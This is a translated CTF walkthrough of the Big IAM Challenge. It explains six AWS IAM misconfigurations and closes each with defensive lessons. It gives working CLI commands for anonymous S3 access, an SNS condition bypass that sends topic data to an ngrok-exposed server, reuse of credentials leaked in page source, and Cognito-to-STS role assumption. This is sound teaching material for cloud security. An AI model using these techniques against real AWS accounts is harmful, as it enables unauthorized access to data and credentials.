About the author: Xiao Wendi, head of the OWASP China Guangdong Branch and a distinguished expert of the Cybersecurity Plus community, is currently a security architect at a foreign company, responsible for application security design, management, and review.

Recently, a foreign colleague recommended to me a CTF called the Big IAM Challenge, created by Wiz, through which one can get a glimpse into, and a deeper understanding of, AWS IAM security.
AWS IAM (Identity and Access Management) is the identity and access management service in Amazon Web Services, used to manage and secure access to AWS resources. IAM allows users to interact with AWS: each user is given unique credentials (an Access Key ID and a Secret Access Key) in order to call AWS services through the API or an SDK.
IAM includes concepts such as users, groups, and roles, which enable fine-grained control over access to AWS services and resources. By using IAM, access to AWS resources can be better managed and restricted, and separation of permissions and other security best practices can be implemented.
It is important to follow best practices when using IAM, such as separating permissions, enforcing a strong password policy, and rotating API keys regularly, to keep AWS resources secure. But are these practices sufficient? What specific vulnerabilities does IAM security have? We can look at the IAM CTF and find out for ourselves.
The AWS IAM CTF, like other CTFs, is a capture-the-flag competition: you find the hidden flag based on each challenge's description. If you are interested in the AWS IAM CTF, you can visit it at the following address:
This CTF has a total of 6 levels, each covering a different IAM security issue.
Level 1
This level is relatively simple. The IAM policy is shown in the following figure:
It is easy to see that the policy allows anonymous listing of the S3 bucket "thebigiamchallenge-storage-9979f4b" and anonymous reading of the objects under its files/ prefix, so the flag file is obviously in the files/ directory of the bucket. The commands are as follows:
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
The third command is especially handy: if you do not have permission to create a file, or cannot download the file to your local machine, you can use it to print the file's contents directly.
Level 2
This level is about SQS, and the IAM policy does not restrict the SQS permissions at all. The policy is as follows:
Since there is no restriction, we can receive messages from this SQS queue ourselves and read their content; the flag is inside. The command used here is:
aws sqs receive-message --queue-url --attribute-names all --message-attribute-names all
The URL of the SQS queue can be assembled from the content of the IAM policy, in the following format: https://sqs.&lt;region&gt;.amazonaws.com/&lt;account-id&gt;/&lt;queue-name&gt;. Based on the above, it is easy to derive the URL of the queue.
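The URL assembly above can be sketched in Python. The region and account ID are the ones that appear in the challenge's ARNs; the queue name below is a placeholder, not the real challenge queue:

```python
# Illustrative helper: build an SQS queue URL from the pieces that an IAM
# policy's Resource ARN exposes (region, account ID, queue name).
def sqs_queue_url(region: str, account_id: str, queue_name: str) -> str:
    return f"https://sqs.{region}.amazonaws.com/{account_id}/{queue_name}"

# "example-queue" is a placeholder for the queue name found in the policy.
print(sqs_queue_url("us-east-1", "092297851374", "example-queue"))
# → https://sqs.us-east-1.amazonaws.com/092297851374/example-queue
```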
The body of the returned message contains a URL; open it to get the flag.
Level 3
This level is about SNS. Looking at the IAM policy, the endpoint is restricted this time. The policy is shown in the following figure:
The restriction here is that sns:endpoint must contain @tbic.wiz.io. At first glance this looks like an email address, but if it were one, there is no way we could obtain a mailbox at tbic.wiz.io. If you look closely at the documentation for SNS endpoints, you will find that there are multiple endpoint types, and all of them are specified through the same sns:endpoint condition key, which gives us a convenient way to bypass this restriction.
A simple analysis shows that when the protocol is https, the endpoint is simply a URL, and we can include @tbic.wiz.io in that URL: an https URL that ends with @tbic.wiz.io satisfies the condition and lets us receive the SNS content.
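A quick way to see why the bypass works: IAM's StringLike condition is a case-sensitive wildcard match, much like a shell glob. Assuming the condition value is "*@tbic.wiz.io" (an assumption based on the policy described above), Python's fnmatch models the comparison:

```python
from fnmatch import fnmatchcase

# Assumed policy condition: StringLike on sns:endpoint against "*@tbic.wiz.io".
CONDITION = "*@tbic.wiz.io"

legit_email = "alice@tbic.wiz.io"                       # the intended match
attacker_url = "https://example.ngrok.io/@tbic.wiz.io"  # attacker-controlled host

print(fnmatchcase(legit_email, CONDITION))   # True
print(fnmatchcase(attacker_url, CONDITION))  # True - a URL matches just as well
```

The wildcard only constrains how the string ends, so any HTTPS endpoint whose URL is crafted to end with @tbic.wiz.io slips through.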
We can simply use Python's Flask to build a small web service that accepts HTTP requests and prints out each request and response, or capture the incoming and outgoing HTTP traffic with a tool such as Burp Suite.
Next, use ngrok to map local services to the Internet, such as "ngrok http localhost:8080".
Then subscribe to the SNS topic using this https URL, with the following command:
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:tbicwizpushnotifications --protocol https --notification-endpoint https:/
Watching the web service at this point, the first request you receive contains a URL; open that URL to confirm the subscription. After that, you will receive a request whose body contains the flag.
Level 4
This level is again about S3. Please see the IAM policy:
As you can see from the IAM policy, no permissions are needed to read S3 objects, but listing the objects in the bucket requires a specific user (admin). So the key to this level is how to bypass the specific-user restriction and get the bucket's object list.
The answer is surprisingly simple: just add the special argument "--no-sign-request" to bypass this restriction. The command line is as follows:
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
Then you can use the normal commands to read the file contents (refer to Level 1 for details) and obtain the flag.
Level 5
This level looks like it's about Cognito, and the IAM policy is as follows:
From the IAM policy, we can only tell that we need to obtain Cognito credentials and then use them to read the contents of an S3 bucket; the flag should be in S3.
Since nothing else is visible, we consider looking at the page's source code, and there is a surprising discovery.
The source code reveals that AWS credentials are actually written into the page. Using the Chrome console, it is easy to extract this information and reuse it to fetch the contents of the S3 bucket.
Here you will run into a new problem, a CORS error. The error message is:
At this point, change the approach: instead of fetching the data directly, generate a signed (presigned) URL for the S3 object; this avoids the error.
Accessing that signed URL reveals the name of the flag file. Then, using the same idea, generate the signed URL corresponding to that file.
Open this signed URL to get the corresponding flag.
Level 6
This level is still about Cognito, and its IAM policy is:
The policy content looks fine, and the Cognito identity value is strictly restricted. However, the challenge also gives the name of an IAM role, arn:aws:iam::092297851374:role/cognito_s3accessauth_role, so let's try to access it using this role.
The information above suggests making a connection from Cognito to the IAM role. Can this be done? It turns out it can.
First of all, you can get a Cognito identity ID with the following command:
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
Then, based on this ID, you can get the Cognito identity's OpenID token:
aws cognito-identity get-open-id-token --identity-id
Finally, use the obtained OpenID token to assume the IAM role:
aws sts assume-role-with-web-identity \
    --duration-seconds 3600 \
    --role-session-name ctf2 \
    --role-arn arn:aws:iam::092297851374:role/cognito_s3accessauth_role \
    --web-identity-token "jwt token"
This creates a role session named ctf2, and the returned temporary credentials can then be used to list the S3 buckets and read their contents, for example with the Python boto3 library.
With an S3 client built from these temporary credentials, you can list the S3 buckets and read their contents, generating a signed URL to obtain the flag.
Reviewing the six levels above, you will find that vulnerabilities hide in the places you least expect.
For example, in Level 1: there are many real-world cases where an S3 bucket with no permission restrictions is exposed to the public Internet, resulting in sensitive data leakage.
For example, in Level 2: since there is no restriction on the SQS queue, it can be accessed from anywhere. As a SaaS service, SQS is reachable directly over the Internet even if you have your own VPC, which is very important to keep in mind. I cannot help but think of services such as Elasticsearch and Kafka, which are often exposed on the Internet; exposed resources can easily be found by scanning, resulting in sensitive data leakage.
For example, in Level 3: SNS appears to have permission restrictions, but for convenience the wildcard character * was used. The intent was to restrict access to the company's own mailboxes, but the endpoint design of SNS has an overlooked detail: all endpoint types are controlled through the same parameter. This makes the restriction easy to bypass, resulting in sensitive data leakage. Sometimes convenience is the enemy of security; what is convenient for you is also convenient for attackers, so be cautious.
For example, in Level 4: I was not familiar with this S3 API behavior and do not know why AWS provides it, allowing the bucket's object list to be retrieved without credentials. The most serious issue, though, is an S3 bucket configured so that everyone can read its files, which is the deadliest mistake. In practice, many people do not realize their content has been put on the public network; without proper permission controls, anyone can obtain your information. Go back and check your own S3 buckets and see whether you find any surprises.
For example, Level 5 is a design flaw: I really did not expect AWS access keys to be placed in the front-end code. Don't people know that front-end code can be read by everyone, and its variables manipulated as well? This is not limited to CTF games; check whether you have a similar situation.
For example, in Level 6: the Cognito service can be associated with an IAM role, which is alarming. Based on the experience above, if I can obtain a Cognito OpenID token and know the ARN of the IAM role, I can create an IAM role session containing an AWS Access Key ID, AWS Secret Key, and AWS session token, and then use this information to impersonate that role. It looks a little scary, doesn't it?
Based on the above analysis, IAM security may not be as solid as it looks. You should review the security best practices in the official AWS documentation, or use tools such as KICS to scan Terraform, CloudFormation, and other infrastructure code, to ensure that IAM configurations follow security best practices from the start.
IAM security is easier said than done, and we need to be cautious.